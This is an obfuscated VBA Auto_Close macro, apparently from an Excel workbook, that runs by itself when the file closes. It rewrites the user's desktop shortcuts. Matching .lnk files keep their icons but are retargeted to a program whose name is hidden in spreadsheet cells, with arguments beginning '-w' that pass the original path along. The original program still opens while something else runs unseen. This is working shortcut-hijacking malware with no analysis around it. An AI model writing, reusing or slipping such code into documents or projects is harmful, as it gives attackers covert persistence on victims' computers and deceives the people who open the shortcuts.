Sub Auto_Close()
Set NCkorW = CreateObject(activeSheet.Range("AU51").value)
Set lQJoGdvj = CreateObject(activeSheet.Range("AY51").value)
Set qQwaMcP = lQJoGdvj.GetFolder(NCkorW.SpecialFolders(activeSheet.Range("BC51").value))
For Each ZaHXYjMO In qQwaMcP.Files
If(InStr(Lcase(ZaHXYjMO), ".lnk")) Then
Set rHbcqxS = NCkorW.CreateShortcut(NCkorW.SPecialFolders(activeSheet.Range("BC51").value) & "\" & ZaHXYjMO.name)
If(InStr(Lcase(rHbcqxS.targetPath), activeSheet.Range("BE51").value) or InStr(Lcase(rHbcqxS.targetPath), activeSheet.Range("BF51").value) or InStr(Lcase(rHbcqxS.targetPath), activeSheet.Range("BI51").value)) Then
rHbcqxS.IconLocation = rHbcqxS.targetpath
rHbcqxS.arguments = "-w " & activeSheet.Range("BJ51").Value & rHbcqxS.targetPath & "'" & activeSheet.Range("BL51").Value
rHbcqxS.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BO51").value
if(Len(rHbcqxS.arguments) < 1023) Then
rHbcqxS.save
end if
end if
end if
next ZaHXYjMO
End Sub
